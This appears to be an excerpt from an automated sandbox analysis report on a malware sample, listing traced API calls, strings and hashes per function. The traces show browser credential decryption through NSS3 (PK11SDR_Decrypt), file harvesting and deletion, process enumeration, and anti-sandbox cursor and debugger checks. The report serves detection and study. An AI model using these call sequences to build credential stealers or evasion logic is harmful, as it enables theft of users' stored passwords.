CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0061B781
PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B78F
PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B7A3
PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B7E3
_memmove.LIBCMT ref: 0061B804
lstrcatA.KERNEL32(00647883,00647887,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B82E
PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B835
lstrcatA.KERNEL32(00647883,0064788A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B844

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
String ID:
API String ID: 4058207798-0
Opcode ID: ca6ec25db96323ff9f5dbf2c05c5b0ce006d7a987a456958acebc4bb0129f563
Instruction ID: 8ae3533cb716bfd17fdae901125469b71394b42860381f14b1d3fd963044d397
Opcode Fuzzy Hash: ca6ec25db96323ff9f5dbf2c05c5b0ce006d7a987a456958acebc4bb0129f563
Instruction Fuzzy Hash: 85313EB1D0421AAFDB109F64DD859FAB7BDAF08745F4400B6F509E2241EB785E848F62

Function 0061C888 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

FindFirstFileA.KERNEL32(?,?,\*.*,006478C7,?,?,?), ref: 0061C8E4
StrCmpCA.SHLWAPI(?,00648604), ref: 0061C905
StrCmpCA.SHLWAPI(?,00648608), ref: 0061C91F

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

CopyFileA.KERNEL32(?,?,00000001), ref: 0061CD54

Part of subcall function 00619148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0061F752,?,?,?), ref: 00619163
Part of subcall function 00619148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0061F752,?,?,?), ref: 0061917A
Part of subcall function 00619148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0061F752,?,?,?), ref: 00619191
Part of subcall function 00619148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0061F752,?,?,?), ref: 006191A8
Part of subcall function 00619148: CloseHandle.KERNEL32(?,?,?,?,?,0061F752,?,?,?), ref: 006191D0

DeleteFileA.KERNEL32(?), ref: 0061CDCB

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

FindNextFileA.KERNEL32(?,?), ref: 0061CE3A
FindClose.KERNEL32(?), ref: 0061CE4E

Strings

\*.*, xrefs: 0061C8AE

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2055012574-1173974218
Opcode ID: f5af9b63e613b806fa5aec979e855407a6d330cd0c52e88ca1d4cb23c3cec6b8
Instruction ID: 35cc61877485868b5aec27b52e0de04d5015edb236c5ba096f3251b938250387
Opcode Fuzzy Hash: f5af9b63e613b806fa5aec979e855407a6d330cd0c52e88ca1d4cb23c3cec6b8
Instruction Fuzzy Hash: 72E1923190052EDBCFA0EB25ED5AACDB37AAF04315F4504E5AA0877121DA366FD98F84

Function 6C44BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C44BD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C44BD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C44BD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C44BD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C44BDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C44BDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C44BDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C44BE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C44BE1E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: eab6ef09a17b4042d80a1001ae3e92e4a2decfd85bf7c56c58fa1f1b057c87f8
Instruction ID: b07c04f75fe8b42126b0d772653050e8ba836f0fd716d2c593edede644cb370e
Opcode Fuzzy Hash: eab6ef09a17b4042d80a1001ae3e92e4a2decfd85bf7c56c58fa1f1b057c87f8
Instruction Fuzzy Hash: 512195B6E04B9967FB00C6569C42F8F3274DBE174EF284518EA1AAEB41F710942486E5

Function 6C4F8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C5414E4,6C4ACC70), ref: 6C4F8D47
PR_GetCurrentThread.NSS3 ref: 6C4F8D98

Part of subcall function 6C3D0F00: PR_GetPageSize.NSS3(6C3D0936,FFFFE8AE,?,6C3616B7,00000000,?,6C3D0936,00000000,?,6C36204A), ref: 6C3D0F1B
Part of subcall function 6C3D0F00: PR_NewLogModule.NSS3(clock,6C3D0936,FFFFE8AE,?,6C3616B7,00000000,?,6C3D0936,00000000,?,6C36204A), ref: 6C3D0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C4F8E7B
htons.WSOCK32(?), ref: 6C4F8EDB
PR_GetCurrentThread.NSS3 ref: 6C4F8F99
PR_GetCurrentThread.NSS3 ref: 6C4F910A

Strings

%u.%u.%u.%u, xrefs: 6C4F8E74

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 8b08a58c240e11e2e31c4440bd34be50667a2d4103bb96457c9a42b84d3dffb3
Instruction ID: 41c4c3aa2890608b3e0266074c8b283199ba3d5f66eab71cf3292feac7353d37
Opcode Fuzzy Hash: 8b08a58c240e11e2e31c4440bd34be50667a2d4103bb96457c9a42b84d3dffb3
Instruction Fuzzy Hash: FF027C329052658FEB15CF19C458F66BBA2EFD3304F19826AD8A15FBA1C332D947C790

Function 006117FD Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00611813
SetThreadDesktop.USER32(00000000), ref: 0061181A
GetCursorPos.USER32(?), ref: 0061182A
Sleep.KERNEL32(000003E8), ref: 0061183A
GetCursorPos.USER32(?), ref: 00611849
Sleep.KERNEL32(00002710), ref: 0061185B
Sleep.KERNEL32(000003E8), ref: 00611860
GetCursorPos.USER32(?), ref: 0061186F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: d682097fedd0b44b4748b9d8ed4ab07645ebe7009b7304925176d41111c34c5a
Instruction ID: 6ebf2707658cc34d9509333ce7b43c579d519f97b361ec99b4c508d28476ff31
Opcode Fuzzy Hash: d682097fedd0b44b4748b9d8ed4ab07645ebe7009b7304925176d41111c34c5a
Instruction Fuzzy Hash: 12114F31E0021DEBDB50DBA4CD99BFE7BBAAF42301F284465D601EA180DB709AC5CB60

Function 6C499C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C36C52B), ref: 6C499D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C49A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C49A114

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C49A01F, 6C49A0E4, 6C49A0FE
database corruption, xrefs: 6C49A029, 6C49A108
%s at line %d of [%.10s], xrefs: 6C49A02E, 6C49A10D

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 70add52b111bd32348b6650426f71f47e88950edee8927b0c018a9237869de47
Instruction ID: a0acfb364bb324bd4355b19f6fc8bfb373dcbb5ba4c6479c3f18b8f199309885
Opcode Fuzzy Hash: 70add52b111bd32348b6650426f71f47e88950edee8927b0c018a9237869de47
Instruction Fuzzy Hash: CB228071A083519FC704CF29C490E2ABBE1BFCA349F148A2DE9DA97751D735D846CB42

Function 0062E88C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0062ECC4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0062ECD9
UnhandledExceptionFilter.KERNEL32( e), ref: 0062ECE4
GetCurrentProcess.KERNEL32(C0000409), ref: 0062ED00
TerminateProcess.KERNEL32(00000000), ref: 0062ED07

Strings

e, xrefs: 0062ECDF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: e
API String ID: 2579439406-1333425256
Opcode ID: dcebc9b7367c433dd9ee841ff65eaf85c0dac5b92868c05d6b65a88848f0c769
Instruction ID: 708096edcb05a254a4503310b65390fade2090107e5335967a3a0dede099fa7f
Opcode Fuzzy Hash: dcebc9b7367c433dd9ee841ff65eaf85c0dac5b92868c05d6b65a88848f0c769
Instruction Fuzzy Hash: C921D4B8401305DFE751EF64FD466443BB7BB09302F60691AE90887360DBB1A981CF55

Function 006243C5 Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 006243CF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006243EE
Process32First.KERNEL32(00000000,00000128), ref: 006243FE
Process32Next.KERNEL32(00000000,00000128), ref: 00624410
StrCmpCA.SHLWAPI(?), ref: 00624422
CloseHandle.KERNEL32(00000000), ref: 00624436

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: cceae4bd8af023f9aafe7a3250bf83ba0e10ab2fc0a99d551e9d6dd76ceef248
Instruction ID: 5a82ea0c96b4924ee4a91deef9521d30e2fcb580a3156da976662de0c6572648
Opcode Fuzzy Hash: cceae4bd8af023f9aafe7a3250bf83ba0e10ab2fc0a99d551e9d6dd76ceef248
Instruction Fuzzy Hash: E50131315416789BEB50AF60AC087DE7AB9BF16742F4480D5E605E2241DE389F41CF61

Function 6C4B9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C378637,?,?), ref: 6C4B9E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C378637), ref: 6C4B9ED6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4B9EC0
database corruption, xrefs: 6C4B9ECA
%s at line %d of [%.10s], xrefs: 6C4B9ECF

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 97ac0ed4e0fb0af353ba6b85f41cd9d39e728c4cb86be62e8bc3e23cddb279ea
Instruction ID: be40c7cbee40bb5aa99fe78ac52b6a07326d68b7903f48ef29391e9f96871088
Opcode Fuzzy Hash: 97ac0ed4e0fb0af353ba6b85f41cd9d39e728c4cb86be62e8bc3e23cddb279ea
Instruction Fuzzy Hash: A9819331B011059FDB04CFA9C881EDEB7F6AF68314B158529E919BBB81E731DD45CBA0

Function 0063C94C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0063CFB5,?,00639D66,?,000000BC,?), ref: 0063C98B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0063CFB5,?,00639D66,?,000000BC,?), ref: 0063C9B4
GetACP.KERNEL32(?,?,0063CFB5,?,00639D66,?,000000BC,?), ref: 0063C9C8

Strings

OCP, xrefs: 0063C96C
ACP, xrefs: 0063C95B

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 092426b88e746ad1802ed196d7782498dd90f8a7a532b67c500aa2bd61757991
Instruction ID: 77fe67aa282fa1da2a2294c0f08d01633ff8cec3e0fee2e9dae716fb2d6faebc
Opcode Fuzzy Hash: 092426b88e746ad1802ed196d7782498dd90f8a7a532b67c500aa2bd61757991
Instruction Fuzzy Hash: A801F739A0074ABEEB219B61EC05F9B33EBAF42768F114029F501F52D0EB60DE4187D9

Function 6C4FCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4FD086
PR_Malloc.NSS3(00000001), ref: 6C4FD0B9
PR_Free.NSS3(?), ref: 6C4FD138

Strings

>, xrefs: 6C4FCF5B

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: b449958f80b7c2797fec9d8f6b225cff7bc22f52333bb628d08a42c20e8a5312
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 49D12662B416460FEB24CC7C88A1FEAB793C7C2379F584329D5719BBE5E6198843C351

Function 6C37AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

pOl, xrefs: 6C37ADA7
winUnlock, xrefs: 6C37AE18
0Ol, xrefs: 6C37ACC0, 6C37AD22, 6C37AD5E, 6C37AE45
winUnlockReadLock, xrefs: 6C37AE9F
POl, xrefs: 6C37ADDB, 6C37ADF5, 6C37AE6A

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID:
